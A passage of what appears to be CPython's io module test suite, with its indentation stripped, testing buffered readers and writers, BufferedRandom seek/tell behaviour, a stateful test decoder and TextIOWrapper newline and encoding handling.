def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs so
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
class CBufferedRandomTest(CBufferedReaderTest, CBufferedWriterTest,
BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegexp(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == '.':
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin1", newline="\r\n")
self.assertEqual(t.encoding, "latin1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf8", line_buffering=True)
self.assertEqual(t.encoding, "utf8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), u'')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with support.check_py3k_warnings():
self.TextIOWrapper(b, encoding="hex_codec")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=u'dummy' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf8")
self.assertEqual(t.encoding, "utf8")
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(True)),
("", testdata.decode("ascii").splitlines(True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super(MyTextIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super(MyTextIO, self).close()
def flush(self):
record.append(3)
super(MyTextIO, self).flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception IOError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin1", "utf8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(IOError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
f = self.open(support.TESTFN, "wb")
f.write(line*2)
f.close()
f = self.open(support.TESTFN, "r", encoding="utf-8")
s = f.read(prefix_size)
self.assertEqual(s, prefix.decode("ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
f = self.open(support.TESTFN, "wb")
f.write(data)
f.close()
f = self.open(support.TESTFN, "r", encoding="utf-8")
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
#Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(IOError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
